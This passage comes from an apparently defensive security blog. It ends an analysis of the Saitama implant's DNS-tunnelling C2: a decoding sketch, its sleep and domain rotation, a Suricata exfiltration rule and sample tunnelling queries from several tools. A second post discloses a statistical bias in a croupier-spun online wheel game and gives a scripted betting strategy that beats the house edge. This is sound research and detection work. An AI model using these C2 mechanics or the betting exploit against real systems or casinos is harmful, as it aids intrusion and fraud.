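BASE = "razupgnv2w01eos4t38h7yqidxmkljc6b9f5"  # shared initial character set

def shuffled_charset(counter, base=BASE):
    # Seed a Mersenne Twister PRNG with the query counter and shuffle the
    # shared character set. Both sides using the same counter arrive at the
    # same shuffled alphabet. (Sketch only: not bit-compatible with Saitama.)
    rng = random.Random(counter)
    chars = list(base)
    rng.shuffle(chars)
    return "".join(chars)

def decode(payload, counter, base=BASE):
    # Substitute characters from the shuffled alphabet back into the base one.
    shuffled = shuffled_charset(counter, base)
    return "".join(base[shuffled.index(ch)] for ch in payload)
```

Encoding on the "client" side is the mirror substitution (base character at index i maps to the shuffled character at index i), so decode() recovers the original data.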

Twist, Sleep, Send, Repeat

Many C2 frameworks allow attackers to manually set the minimum and maximum sleep times for their implants. While low sleep times allow attackers to more quickly execute commands and receive outputs, higher sleep times generate less noise in the victim network. Detection often relies on thresholds, where suspicious behaviour will only trigger an alert when it happens multiple times in a certain period.  

The Saitama implant uses hardcoded sleep values. During active communication (such as when it returns command output back to the server), the minimum sleep time is 40 seconds while the maximum sleep time is 80 seconds. On every DNS query sent, the client will pick a random value between 40 and 80 seconds. Moreover, the DNS query is not sent to the same domain every time but is distributed across three domains. On every request, one of these domains is randomly chosen. The implant has no functionality to alter these sleep times at runtime, nor does it possess an option to ‘skip’ the sleeping step altogether.  

Sleep configuration of the implant. The integers represent sleep times in milliseconds
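The scheduling described above can be sketched as follows (the domain names are placeholders of my own; the real C2 domains are hardcoded in the implant):

```python
import random

# Placeholder C2 domains; the implant distributes queries across three
# hardcoded domains, chosen at random per request.
DOMAINS = ["c2-domain-one.example", "c2-domain-two.example", "c2-domain-three.example"]

def next_query_schedule():
    delay_ms = random.randint(40_000, 80_000)  # 40-80 s sleep, picked per query
    domain = random.choice(DOMAINS)            # one of three domains per query
    return delay_ms, domain
```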

These sleep times and distribution of communication hinder detection efforts, as they allow the implant to further ‘blend in’ with legitimate network traffic. While the traffic itself appears anything but benign to the trained eye, the sleep times and distribution bury the ‘needle’ that is this implant’s traffic very deep in the haystack of the overall network traffic.  

For attackers, choosing values for the sleep time is a balancing act between keeping the implant stealthy while keeping it usable. Considering Saitama’s sleep times and keeping in mind that every individual DNS query only transmits 15 bytes of output data, the usability of the implant is quite low. Although the implant can compress its output using zlib deflation, communication between server and client still takes a lot of time. For example, the standard output of the ‘whoami /priv’ command, which once zlib deflated is 663 bytes, takes more than an hour to transmit from victim machine to a C2 server. 

Transmission between server implementation and the implant

The implant does contain a set of hardcoded commands that can be triggered using only one command code, rather than sending the command in its entirety from the server to the client. However, there is no way of knowing whether these hardcoded commands are even used by attackers or are left in the implant as a means of misdirection to hinder attribution. Moreover, the output from these hardcoded commands still has to be sent back to the C2 server, with the same delays as any other sent command. 

Detection

Detecting DNS tunnelling has been the subject of research for a long time, as this technique can be implemented in a multitude of different ways. In addition, the complications of the communication channel force attackers to make more noise, as they must send a lot of data over a channel that is not designed for that purpose. While ‘idle’ implants can be hard to detect due to little communication occurring over the wire, any DNS implant will have to make more noise once it starts receiving commands and sending command outputs. These communication ‘bursts’ are where DNS tunnelling can most reliably be detected. In this section we give examples of how to detect Saitama and a few well-known tools used by actual adversaries.  

Signature-based 

Where possible we aim to write signature-based detection, as this provides a solid base and quick tool attribution. The randomization used by the Saitama implant as outlined previously makes signature-based detection challenging in this case, but not impossible. When actively communicating command output, the Saitama implant generates a high number of randomized DNS queries. This randomization does follow a specific pattern that we believe can be generalized in the following Suricata rule: 

alert dns $HOME_NET any -> any 53 (msg:"FOX-SRT - Trojan - Possible Saitama Exfil Pattern Observed"; flow:stateless; content:"|00 01 00 00 00 00 00 00|"; byte_test:1,>=,0x1c,0,relative; fast_pattern; byte_test:1,<=,0x1f,0,relative; dns_query; content:"."; content:"."; distance:1; content:!"."; distance:1; pcre:"/^(?=[0-9]+[a-z]\|[a-z]+[0-9])[a-z0-9]{28,31}\.[^.]+\.[a-z]+$/"; threshold:type both, track by_src, count 50, seconds 3600; classtype:trojan-activity; priority:2; reference:url, https://github.com/fox-it/saitama-server; metadata:ids suricata; sid:21004170; rev:1;) 

This signature may seem a bit complex, but dissected into its separate parts it becomes intuitive given the previous sections. 

Content Match  Explanation 
|00 01 00 00 00 00 00 00|  DNS query header. This match is mostly used to place the pointer at the correct position for the byte_test content matches. 
byte_test:1,>=,0x1c,0,relative;  The next byte should be at least 28 (0x1c). This byte signifies the length of the subdomain that follows. 
byte_test:1,<=,0x1f,0,relative;  The same byte should be at most 31 (0x1f). 
dns_query; content:"."; content:"."; distance:1; content:!".";  The DNS query should contain precisely two '.' characters. 
pcre:"/^(?=[0-9]+[a-z]|[a-z]+[0-9])[a-z0-9]{28,31}\.[^.]+\.[a-z]+$/";  The subdomain should consist of 28 to 31 lowercase letters and digits, containing at least one of each and no other types of characters. 
threshold:type both, track by_src, count 50, seconds 3600  Only trigger if there are 50 or more queries in the last 3600 seconds, and only alert once per 3600 seconds. 
Table one: Content matches for Suricata IDS rule

 
The choice for 28-31 characters is based on the structure of DNS queries containing output. First, one byte is dedicated to the ‘send and receive’ command code. Then follows the encoded ID of the implant, which takes between 1 and 3 bytes. Next, 2 bytes are dedicated to the byte index of the output data, followed by 20 bytes of base32-encoded output. Lastly, the current value of the ‘counter’ variable is sent. As this number can range between 0 and 46656, it takes between 1 and 5 bytes. 
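The pcre portion of the rule can be exercised in isolation to confirm it captures this structure. A minimal sketch using Python's re module (close enough to PCRE for this expression); the domains below are synthetic placeholders, not real C2 infrastructure:

```python
import re

# The pcre from the Suricata rule above: a 28-31 character lowercase
# alphanumeric subdomain mixing letters and digits, followed by exactly
# two further labels.
SAITAMA_EXFIL = re.compile(
    r"^(?=[0-9]+[a-z]|[a-z]+[0-9])[a-z0-9]{28,31}\.[^.]+\.[a-z]+$"
)

def looks_like_saitama_exfil(fqdn: str) -> bool:
    """Return True if the query name matches the exfil pattern."""
    return SAITAMA_EXFIL.match(fqdn) is not None

print(looks_like_saitama_exfil("a" * 14 + "1" * 14 + ".example.com"))  # True: 28 chars, mixed
print(looks_like_saitama_exfil("a" * 40 + ".example.com"))             # False: too long
print(looks_like_saitama_exfil("1" * 28 + ".example.com"))             # False: digits only
```

Note that the lookahead enforces the mixed letters-and-digits requirement, so an all-letter or all-digit label of the right length still fails to match.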

Behaviour-based 

The randomization that makes it difficult to create signatures is also to the defender’s advantage: most benign DNS queries are far from random. As seen in the table below, each hack tool outlined has at least one subdomain with an encrypted or encoded part. While one might initially opt for measuring entropy to approximate randomness, that technique is less reliable when the input string is short. The use of N-grams, an approach we have previously written about [4], is better suited. 
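As an illustration of the N-gram idea (the corpus and scoring below are toy assumptions, not our production model), a label can be scored by the mean log-probability of its character bigrams; random-looking labels score markedly lower than natural ones:

```python
import math
from collections import Counter

# Toy bigram model: a real deployment would train on a large corpus of
# known-benign DNS labels. These words are illustrative assumptions.
CORPUS = [
    "mail", "update", "windowsupdate", "telemetry", "static", "images",
    "login", "account", "download", "content", "services", "analytics",
]

def bigrams(s: str):
    return [s[i:i + 2] for i in range(len(s) - 1)]

COUNTS = Counter(bg for word in CORPUS for bg in bigrams(word))
TOTAL = sum(COUNTS.values())

def score(label: str) -> float:
    """Mean log-probability of the label's bigrams; higher = more natural."""
    # Laplace smoothing over the 36x36 alphanumeric bigram space, so unseen
    # bigrams (digit pairs and the like) get a small non-zero probability.
    probs = [(COUNTS[bg] + 1) / (TOTAL + 36 * 36) for bg in bigrams(label)]
    return sum(map(math.log, probs)) / len(probs)

print(score("windowsupdate") > score("6wcrrrry9i8t5b8fyfjrrlz9iw9arpcl"))  # True
```

In practice the cut-off between ‘natural’ and ‘randomized’ would be picked empirically from a large benign baseline.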

Hacktool  Example 
DNScat2  35bc006955018b0021636f6d6d616e642073657373696f6e00.domain.tld 
Weasel  pj7gatv3j2iz-dvyverpewpnnu--ykuct3gtbqoop2smr3mkxqt4.ab.abdc.domain.tld 
Anchor  ueajx6snh6xick6iagmhvmbndj.domain.tld 
Cobalt Strike  Api.abcdefgh0.123456.dns.example.com or post.4c6f72656d20697073756d20646f6c6f722073697420616d65742073756e74207175697320756c6c616d636f20616420646f6c6f7220616c69717569702073756e7420636f6d6d6f646f20656975736d6f642070726.c123456.dns.example.com 
Sliver  3eHUMj4LUA4HacKK2yuXew6ko1n45LnxZoeZDeJacUMT8ybuFciQ63AxVtjbmHD.fAh5MYs44zH8pWTugjdEQfrKNPeiN9SSXm7pFT5qvY43eJ9T4NyxFFPyuyMRDpx.GhAwhzJCgVsTn6w5C4aH8BeRjTrrvhq.domain.tld 
Saitama  6wcrrrry9i8t5b8fyfjrrlz9iw9arpcl.domain.tld 
Table two: Example DNS queries for various toolings that support DNS tunnelling

Unfortunately, the detection of randomness in DNS queries is by itself not a solid enough indicator to detect DNS tunnels without yielding large numbers of false positives. However, a second limitation of DNS tunnelling is that a DNS query can only carry a limited number of bytes. To be an effective C2 channel an attacker needs to be able to send multiple commands and receive corresponding output, resulting in (slow) bursts of multiple queries.  

This is where the second step for behaviour-based detection comes in: plainly counting the number of unique queries that have been classified as ‘randomized’. The specifics of these bursts differ slightly between tools, but in general there is little or no idle time between two queries. Saitama is an exception in this case: it sleeps for a uniformly distributed interval of between 40 and 80 seconds between two queries, meaning that on average there is a one-minute delay. This expected sleep of 60 seconds is an intuitive starting point for determining the threshold. If we aggregate over an hour, we expect 60 queries distributed over 3 domains. However, this is the mean value, and in 50% of cases there will be fewer than 60 queries in an hour. 

To be sure we detect this regardless of the random sleeps, we can use the fact that the sum of uniform random observations approximates a normal distribution. With this distribution we can calculate the query count that is reached with an acceptable probability; looking at the distribution, that threshold would be 53. We use 50 in our signature and other rules to account for possible packet loss and other unexpected factors. Note that this number varies between tools and is therefore not a set-in-stone threshold. Different thresholds for different tools may be used to balance false positives and false negatives. 
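A back-of-the-envelope sketch of that calculation, using the standard normal approximation for renewal processes (an assumption on our part; the original threshold may have been derived differently):

```python
import math

def p_at_least(k: int, window: float = 3600.0, lo: float = 40.0, hi: float = 80.0) -> float:
    """Approximate P(at least k queries in `window` seconds) when the
    inter-query sleep is uniform on [lo, hi] seconds, via the normal
    approximation for renewal processes: N(t) ~ Normal(t/mu, t*var/mu^3)."""
    mu = (lo + hi) / 2                     # mean sleep: 60 s for Saitama
    var = (hi - lo) ** 2 / 12              # variance of the uniform sleep
    mean_n = window / mu                   # ~60 expected queries per hour
    sd_n = math.sqrt(window * var / mu ** 3)
    z = (k - 0.5 - mean_n) / sd_n          # continuity-corrected tail
    return 0.5 * math.erfc(z / math.sqrt(2))

print(round(p_at_least(50), 3))  # ~1.0: a threshold of 50 fires on nearly every active hour
print(round(p_at_least(70), 3))  # ~0.0: a threshold of 70 would almost never fire
```

The query count concentrates tightly around 60 per hour (standard deviation of roughly 1.5), which is why a threshold a little below the mean catches virtually every active hour.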

In summary, combining the detection of random-appearing DNS queries with a minimum threshold of such queries per hour can be a useful approach for detecting DNS tunnelling. We found in our testing that there can still be some false positives, for example caused by antivirus solutions. Therefore, a last step is creating a small allow list for domains that have been verified to be benign. 

While more sophisticated detection methods may be available, we believe this method is still powerful (at least powerful enough to catch this malware) and more importantly, easy to use on different platforms such as Network Sensors or SIEMs and on diverse types of logs. 

Conclusion

When new malware arises, it is paramount to verify existing detection efforts to ensure they properly trigger on the newly encountered threat. While Indicators of Compromise can be used to retroactively hunt for possible infections, we prefer the detection of threats in (near-)real-time. This blog has outlined how we developed a server-side implementation of the implant to create a proper recording of the implant’s behaviour. This can subsequently be used for detection engineering purposes. 

Strong randomization, such as observed in the Saitama implant, significantly hinders signature-based detection. We detect the threat by detecting its evasive method, in this case randomization. Legitimate DNS traffic rarely consists of random-appearing subdomains, and to see this occurring in large bursts to previously unseen domains is even more unlikely to be benign.  

Resources

With the sharing of the server-side implementation and recordings of Saitama traffic, we hope that others can test their defensive solutions.  

The server-side implementation of Saitama can be found on the Fox-IT GitHub.  

This repository also contains an example PCAP & Zeek logs of traffic generated by the Saitama implant. The repository also features a replay script that can be used to parse executed commands & command output out of a PCAP. 

References

[1] https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/ 
[2] https://blog.malwarebytes.com/threat-intelligence/2022/05/how-the-saitama-backdoor-uses-dns-tunnelling/ 
[3] https://x-junior.github.io/malware%20analysis/2022/06/24/Apt34.html
[4] https://blog.fox-it.com/2019/06/11/using-anomaly-detection-to-find-malicious-domains/   

Wheel of Fortune Outcome Prediction – Taking the Luck out of Gambling

16 August 2022 at 19:50

Authored by: Jesús Miguel Calderón Marín

Introduction

Two years ago I carried out research into online casino games specifically focusing on roulette. As a result, I composed a detailed guide with information on classification of online roulette, potential vulnerabilities and the ways to detect them[1].

Although this guideline was particularly well-received by the security community, I felt that it was too theoretical and lacked a real-world example of a vulnerable casino game. With this in mind, I decided to carry out research on a real casino game in search of new vulnerabilities and exploitation techniques. In case of success, I planned to share the results with the affected vendor [2] and afterwards with the community.

While looking for a target, I came across a particular variant of the casino game ‘Wheel of Fortune’. The wheel is spun manually by a croupier and not by any automated system. That caught my eye and made me think about the randomness of the winning numbers. Typically, pseudo-random number generators (PRNGs) are one of the main targets in game security assessments. However, there is no PRNG in this case: the randomness relies on the number of times the croupier spins the wheel, which in turn depends on, among other things, their arm strength. The question that immediately came to my mind was: is a croupier a good ‘PRNG’?

Summary

IMPORTANT NOTE. For security reasons and in order to keep confidential the identity of the vendor and game affected, some data has been redacted or omitted and the name of the game was changed to a generic one (Big Six). In addition, screenshots of the real wheel and croupiers have been substituted by similar images specially created for this purpose.

Big Six is a casino game based on the Wheel of Fortune. Briefly, it is a big vertical wheel on which the player bets on the number it will stop on [3].

According to this security analysis, the outcome of the Big Six game is predictable enough that the house edge can be overcome and, consequently, a profit can be made in the long run. Generally speaking, croupiers unconsciously tend to spin the wheel a specific number of times, so the dispersion of the number of spins is too small. Consequently, some positions of the wheel have higher chances of winning, and a player can benefit by betting on these positions.

Table of Contents

The rules

The wheel is comprised of 54 segments. The possible outcomes on the wheel are 1, 2, 5, 10, 20, 40, multiplier 1 (M1) and multiplier 2 (M2).

Figure 1 – Big Six Wheel

Players bet on a number they think the wheel will land on and then the croupier spins the wheel. The bets must be placed within the table limits, which are shown on the screen. The colour around the countdown indicates when players can place bets (green), when betting time is nearly over (amber) and when no further bets can be placed for the current round (no countdown).

Figure 2 – Phases of the betting round

It is worth mentioning that the croupier starts spinning the wheel before the betting time is over and continues doing it for several seconds once the betting time is over and the betting panel is no longer available.

A few spins later, the winning number is determined and pay-outs are made on winning bets.

Figure 3 – Winning segment indicated by the leather pointer at the top of the wheel

Odds and pay-outs

The wheel can stop on the numbers 1, 2, 5, 10, 20 and 40. The pay-out of each segment is a bet multiplied by its number plus the stake. For example, if a player bets 15 pounds on number 10 and this turns out to be the winning number, the player is paid 165 pounds (15 x 10 + 15).
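The pay-out rule can be expressed as a one-liner; a minimal sketch reproducing the worked example above:

```python
def payout(stake: float, number: int) -> float:
    """Total returned on a winning bet: the stake multiplied by the
    segment's number, plus the original stake."""
    return stake * number + stake

print(payout(15, 10))  # 165: the example from the text (15 x 10 + 15)
```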

The segments M1 and M2 are multiplier segments, which makes the game more interesting. If the wheel stops on any of them, new bets are not accepted, and the wheel is spun again. However, any wins on the next spin are multiplied by [*REDACTED*] or [*REDACTED*], according to the multiplier the wheel stops on in the original spin. If the wheel stops on two or more multipliers, the final win is increased by as many times as all the multipliers before indicate.

The table below shows the number of stops, pay-out and house edge for each possible outcome:

Table 1 – Odds and pay-outs

Wheel tracker

A script was developed to record the behaviour and outcomes of the Big Six online game. The data obtained included, inter alia, the initial speeds of the wheel, the croupiers and the winning numbers.

7,278 hands were recorded in April 2021 and subsequently analysed. The figures below show some of those hands.

Figure 4 – Tracked hands

Among most relevant data for analysis, the following is included:

  • winningNumber – the winning number displayed on the wheel as the outcome of every hand (1, 2, 5, 10, 20, 40, M1, or M2).
Figure 5 – Winning Number ‘2’
  • AbsolutePosition – unique number to identify unambiguously every segment. E.g. the yellow segment has the absolute position 0. This does not vary from hand to hand unlike relative positions (see the definition below).
Figure 6 – Segments’ identifiers (absolute positions 0, 18, 30, 43)
  • winningAbsolutePosition – the absolute position of the segment of the winning number. The following picture shows the winning number 40, which has the absolute position 0.
Figure 7 – Winning Absolute Position ‘0’
  • direction – the direction in which the wheel is spun. The value assigned to it is whether ‘CLOCKWISE’ or ‘ANTICLOCKWISE’.
  • positions_run – identical to the number of the wheel spins multiplied by 54 (the number of segments the wheel is divided into). For instance, if the wheel spins 1.5 times, the value of this variable will be 81 (1.5 * 54).
  • HAND_TIME (Initial position) – The moment in the video when the hand starts (e.g. 35.2 seconds from the beginning of the recording). This coincides with the instant before the betting panel is disabled and no longer available until the next game (specifically 0.5 seconds before). The position of the wheel at this moment will be referred to as the initial position from now on.
Figure 8 – Initial position – instant before the betting panel is disabled
Figure 9 – Instant when the betting panel is disabled
  • Relative positions – unique numbers to identify the segments of the wheel which are assigned at the initial position beginning from the segment on the top (position 1), followed by the next segment (position 2), etc. The next segment is on its left if the direction is clockwise or on its right if the direction is anticlockwise.
Figure 10 – Relative positions assigned at the initial position
  • winningRelativePosition – defines the relative position of the segment containing the winning number. It can be calculated using the following formula: round(positions_run % 54, 0) + 1. E.g. in the figures below, the blue segment that is in the relative position number 10 is the winning one. Therefore, the winning relative position is 10 for this hand.
Figure 11 – Initial position – Relative positions
Figure 12 – Final position – Winning relative position ‘10’
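The winningRelativePosition formula above can be written directly in code. A minimal sketch (the extra modulo is our addition, guarding the edge case where rounding lands exactly on a full revolution):

```python
SEGMENTS = 54

def winning_relative_position(positions_run: float) -> int:
    """Relative position (1-54) of the winning segment, per the formula
    round(positions_run % 54, 0) + 1 given above. The extra modulo folds
    the rounding edge case (e.g. round(53.7) == 54) back to position 1."""
    return round(positions_run % SEGMENTS) % SEGMENTS + 1

# 1.5 full spins = 81 segment-widths: the wheel travels 27 segments past a
# whole revolution, so the segment at relative position 28 wins.
print(winning_relative_position(81))  # 28
```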

Wheel behaviour analysis

The values of the variables ‘winningAbsolutePosition’, ‘winningNumber’ and ‘winningRelativePosition’ were analysed to establish whether they are random. To do this, the chi-square goodness-of-fit test was used to ascertain whether the difference between the observed distribution and the expected distribution can be attributed to chance or, on the contrary, to a lack of randomness, which could eventually be exploited by a malicious player. Should any further information about the method be required, the references added to this document can be consulted [1][2].

Variables winningNumber and winningAbsolutePosition

The variables ‘winningNumber’ and ‘winningAbsolutePosition’ passed the test. In particular, for ‘winningNumber’ the chi-squared statistic was 4.48. The critical value for the chi-square distribution with 7 degrees of freedom and a significance level of 1% is 18.47 [3]. As the critical value is significantly higher than the chi-squared statistic (4.48), it cannot be stated that the winning numbers are not random.

Similarly, the statistic for ‘winningAbsolutePosition’ was 32.18, which is much less than the critical value of 79.84 (53 degrees of freedom and a significance level of 1%). This implies that it cannot be stated that the segments differ in size or that the wheel is biased.

Variable winningRelativePosition

However, as for the parameter ‘winningRelativePosition’, it is notable that some positions win more frequently than others do, which could make it possible for a player to overcome the house edge and benefit from it. According to the collected data, the chi-squared statistic is 90.75 and exceeds the critical value 79.84 (53 degrees of freedom and a level of significance of 1%). In addition, the p-value (probability of obtaining test results at least as extreme as the results actually observed) [4] is 0.095%. These results suggest that the parameter ‘winningRelativePosition’ is far from being random.

Table 2 – Chi Squared – winningRelativePosition
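The statistic itself is simple to compute. An illustrative sketch with synthetic counts (these are not the recorded data), compared against the critical value quoted in the text:

```python
def chi_square_statistic(observed, expected):
    """Pearson's goodness-of-fit statistic: sum((O - E)^2 / E)."""
    return sum((o - e) ** 2 / e for o, e in zip(observed, expected))

# 54 equally likely relative positions and 5,400 hypothetical hands
# -> 100 expected wins per position.
expected = [100.0] * 54
fair     = [100] * 54                  # a perfectly fair wheel
biased   = [150] * 27 + [50] * 27     # some positions win far more often

CRITICAL = 79.84  # chi-square critical value: 53 dof, 1% significance (from the text)
print(chi_square_statistic(fair, expected))    # 0.0
print(chi_square_statistic(biased, expected))  # 1350.0: far beyond the critical value
```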

The table below shows that the p-value is even lower for winning relative positions in hands spun clockwise: 0.00000014%.

Table 3 – Chi Squared – winningRelativePosition – Clockwise

Simultaneous confidence intervals [5][6] were calculated for this last sample to ultimately know the maximum and minimum potential benefit which a player would be able to gain. In order to work this out, the Wilson score method was used with a confidence level of 90%.

It was estimated that, in the worst case, a player has a probability of 2.15% of winning when betting on position 29. This probability considerably exceeds the expected value (1.851%) and implies a significant advantage for the player.

Table 4 -Confidence Intervals (Wilson method – 90% confidence) for winning relative positions – CLOCKWISE
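A single-proportion Wilson score interval can be sketched as follows. Note that the analysis above computes simultaneous multinomial intervals (e.g. via MultinomCI), which adjust the z value, so the counts below are purely hypothetical:

```python
import math

def wilson_interval(successes: int, n: int, z: float = 1.6449):
    """Wilson score interval for a binomial proportion
    (z = 1.6449 corresponds to ~90% two-sided confidence)."""
    p = successes / n
    denom = 1 + z * z / n
    centre = (p + z * z / (2 * n)) / denom
    half = (z / denom) * math.sqrt(p * (1 - p) / n + z * z / (4 * n * n))
    return centre - half, centre + half

# Hypothetical counts: a position winning 95 of 3,646 clockwise hands.
lo, hi = wilson_interval(95, 3646)
print(lo > 1 / 54)  # True for these counts: even the lower bound beats the fair 1.85%
```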

Exploiting lack of randomness on winning relative positions

In order to exploit the lack of randomness of winning relative positions, betting strategies have to be designed. The following two sections include betting strategies designed for clockwise and anticlockwise games, and the analysis of their efficiency in comparison with other strategies.

Betting Strategies

A very simple winning betting strategy consists in betting on number 40 if the segment (there is only one segment with number 40) is in the relative position 29 and the wheel direction is clockwise. The following shows an example of how this strategy works. 

The image below shows the initial position of the wheel (this coincides with the instant before the betting panel is disabled and no longer available until the next game). Number 40 is in the relative position 8 but not in the relative position 29. Therefore, this game would be ignored, and no bets should be made.

Figure 13 – Initial position – Segment 40 is on the relative position 8

In the following initial position, number 40 is in the relative position 29. Therefore, a bet should be made on number 40.

Figure 14-  Initial position – Segment 40 is on the relative position 29

It is worth mentioning that the bets would need to be made in an automated way using a script because such tasks as identifying the number positioned in a specific relative position, and making (or not making) a bet within 0.5 seconds, are not possible to do manually.

According to the simultaneous confidence intervals calculated previously, the probability of winning would be between 2.15% and 3.01% (without taking into account the M2 and M1 segments), which considerably exceeds the expected value (1/54 = 0.0185 = 1.85%).

Taking into account the aforementioned probabilities and assuming that:

  • the wheel stops on the segments ‘M1’ and ‘M2’ with probabilities 1.9% and 1.4% in the worst of the cases, and 2.71% and 2.12% in the best of the cases.
  • all the segments have equal probability of winning if previously the wheel stopped on ‘M2’ or ‘M1’
  • the size of the bet is always 1€ and the winning quantity limit is 500.000€

it was estimated that the player could obtain a return on betting ranging from 0.56% to 41.80% using this strategy. For instance, a player would win a minimum of 5.6€ and a maximum of 418€ for every 1,000€ bet, with approximately 90% confidence.

Notably, this strategy might require a long time to obtain a ‘worthy’ benefit, as most games are discarded: bets are only placed when number 40 is in relative position 29.

As a proof of concept, a more complex betting strategy was designed based on the estimated probabilities and expected ROI. It will be referred to as ‘MY BETTING STRATEGY’ from now on.

Table 5 – My betting strategy

Depending on the direction (CLOCKWISE and ANTICLOCKWISE), the strategies are different.

The columns ‘BEST NUMBER TO BET ON’ contain the numbers which the player should bet on and the columns ‘RELATIVE POSITION OF NUMBER 40’ indicate the relative position of number 40.

For example, if the wheel is spinning clockwise and the relative position of the segment 40 is 7 (see the image below), the player should not bet on any number.

Figure 15 – Initial position – Segment 40 is on the relative position 7

However, if the wheel is spinning clockwise and the relative position of the segment 40 is 39, the player should bet on number 10 according to the strategy (see the following image and table).

Figure 16 – Initial position – Segment 40 is on the relative position 39
Table 6 – Excerpt from the ‘My betting strategy’ table

Analysing the effectiveness of betting strategies

A computer simulation of a fictitious player following ‘MY BETTING STRATEGY’ described in the previous section was run using the sample of 7,278 games (Figure 4 – Tracked hands).

For the simulation, it was assumed that:

  • all the segments have equal probability of winning if previously the wheel stopped on ‘M2’ or ‘M1’
  • as the winning numbers after the wheel stopped on ‘M2’ and ‘M1’ were not tracked by the script, the expected ROI was returned when the winning segment was either ‘M2’ or ‘M1’. For instance, if, following the strategy, one euro is bet on number 10 and the wheel stops on the segment ‘M2’, the total balance is increased by [*REDACTED*], as this quantity is the expected ROI over the long run.
  • the size of the bet is always 1€ and the winning quantity limit is 500.000€

 The following table shows the results:

Table 7 – ROI of ‘My betting strategy’

Notice that not all the games were played. E.g. for the ‘CLOCKWISE’ direction, 1,102 out of 3,646 games were played, which means that 2,544 were ignored as they were not profitable according to the strategy.

The balance shows the winnings (positive in both cases) and the column ‘ROI’ indicates the average amount of money the player made per hand played. In other words, ROI = 100 * ‘BALANCE’ / ‘GAMES PLAYED’.

In order to determine the effectiveness of the betting strategy, the probability of obtaining a return greater than or equal to the returns obtained was worked out. Specifically, a bootstrap[7] analysis was performed to estimate the distribution of returns for the following losing strategies:

  • RANDOM strategy consists in betting on any number (1, 2, 5, 10, 20 or 40) randomly.
  • ALWAYS 10 strategy consists in always betting on number 10. This is a very interesting strategy to compare with ‘MY BETTING STRATEGY’, as number 10 has the lowest house edge among all the numbers, [*REDACTED*]% (see Odds and pay-outs). Therefore, the ‘ALWAYS 10’ strategy should be the best of the losing strategies, as it minimises the losses per hand. 
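A bootstrap of a baseline strategy's returns can be sketched as below; the per-hand returns and the ‘observed’ ROI are hypothetical stand-ins, not the recorded data:

```python
import random

random.seed(7)

# Hypothetical per-hand returns (stake 1 unit) for a losing baseline
# strategy over 1,000 hands: mostly losses, a few wins on 40 and 10.
sample = [-1] * 960 + [40] * 15 + [10] * 25

def bootstrap_means(data, runs=2000):
    """Resample with replacement and collect the distribution of mean returns."""
    n = len(data)
    return [sum(random.choices(data, k=n)) / n for _ in range(runs)]

dist = bootstrap_means(sample)
observed_roi = 0.10  # hypothetical per-hand ROI of the strategy under test
# Probability that the baseline matches or beats the observed ROI by chance:
p_value = sum(m >= observed_roi for m in dist) / len(dist)
print(f"P(baseline >= observed ROI) ~ {p_value:.3f}")
```

A small p-value here would mean the tested strategy's return is unlikely to be luck, which mirrors the comparison carried out in the analysis.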

It is worth mentioning that Monte Carlo[8] analysis was performed as well, which yielded very similar results.

The following table shows the results of the analysis:

Table 8 – Results of the comparison between the strategies ‘RANDOM’, ‘ALWAYS 10’ and ‘MY BETTING STRATEGY’

As can be observed, the probability of obtaining a return greater than or equal to that of ‘MY BETTING STRATEGY’ with the ‘random’ and ‘always 10’ betting strategies (across 1,102 and 303 games respectively) is less than 1%. This result suggests that the high effectiveness of ‘MY BETTING STRATEGY’ is far from being down to luck.

The following graphs visually illustrate the effectiveness of ‘MY BETTING STRATEGY’ for the CLOCKWISE direction in comparison with the ‘random’ and ‘always 10’ betting strategies. A thousand games were simulated.

Figure 17 – MY BETTING STRATEGY vs ALWAYS 10 strategy
Figure 18 – MY BETTING STRATEGY strategy vs RANDOM strategy

It is noteworthy that better strategies could be worked out. However, they were not explored: the aim of this analysis was not to exploit the lack of randomness efficiently, but to highlight the fact that the house edge could be overcome.

Other Considerations

It is worth mentioning that no intrusive tests were conducted during this research. Additionally, it was not necessary to place any bets to detect or prove the potential vulnerability described in this document. Interaction with the game was limited to recording videos of the wheel, which were analysed afterwards.

Other online games were found to be similar to Big Six. Therefore, these games might be vulnerable as well.

Recommendations

It is recommended to make the necessary changes to the game in order to generate random winning relative positions. This way, it will not be possible to overcome the house edge and make profit in the long run.

The best and safest solution (and probably the most expensive to implement) is to replace the croupiers with hardware that randomly generates the outcome and spins the wheel with the exact strength needed to show the previously determined number as the winning number.

Another solution might consist in increasing the difference between the minimum and maximum number of wheel spins. According to the observations, the croupiers currently spin the wheel approximately between 2.7 times (150 segments) and 4.7 times (258 segments). This means a difference of only two wheel spins (4.7 – 2.7 = 2). Additionally, it was observed that the croupiers unconsciously tend to spin the wheel a specific number of times, particularly between 3.56 and 3.62 times (192.5 – 195.5 segments), as can be seen in the following histogram:

Picture 19 – Number of spins (expressed in number of segments)

Apparently, the fact that this distribution is bell-shaped is the reason why the winning positions are not random enough. Therefore, increasing the difference between the maximum and minimum number of wheel spins will help to flatten the curve and, consequently, to obtain more random winning numbers.

To illustrate this solution, a simulation of 7,200 wheel spins, whose numbers of segments run ranged from 147.5 to 511 (4 wheel spins difference instead of 2), was conducted. Its histogram can be seen in the image below:

Picture 20 – Number of spins (expressed in number of segments)

A chi-square test was conducted, and the p-value obtained was 98.6%. This result conforms well with a fair game, and the deviation from expectations is well within the normal range.
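The effect of widening the spin range can be reproduced in a quick simulation. The bell-shaped ‘croupier’ distribution below is a rough stand-in (a Gaussian centred on ~3.6 turns), our own assumption rather than the recorded distribution:

```python
import random

random.seed(1)
SEGMENTS = 54

def winning_positions(distances):
    """Tally winning positions for a sequence of travel distances (segment widths)."""
    counts = [0] * SEGMENTS
    for d in distances:
        counts[round(d % SEGMENTS) % SEGMENTS] += 1
    return counts

def chi2(counts):
    """Pearson statistic against a uniform expectation."""
    e = sum(counts) / SEGMENTS
    return sum((c - e) ** 2 / e for c in counts)

# Bell-shaped croupier spins concentrated around ~3.6 turns (194 segments):
narrow = winning_positions(random.gauss(194, 12) for _ in range(7200))
# Proposed fix: spread the travel distance over several extra turns:
wide = winning_positions(random.uniform(147.5, 511) for _ in range(7200))

print(chi2(narrow) > chi2(wide))  # True: the wider spread flattens the distribution
```

Because the narrow, bell-shaped distribution concentrates most of its mass on a fraction of a revolution, certain positions dominate; spreading the travel distance over additional full turns washes that concentration out.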

Table 9 – Chi Squared – Winning numbers

Alternatively, players’ winnings could be monitored and analysed statistically in real time. If a player’s winnings were unlikely to be by chance at a particular time, their account could be blocked temporarily and further investigation undertaken. Additionally, suspicious betting patterns could be monitored as well. For example, a player sporadically betting only on specific numbers (40 and 20) could be indicative of a player trying to exploit this issue.

References

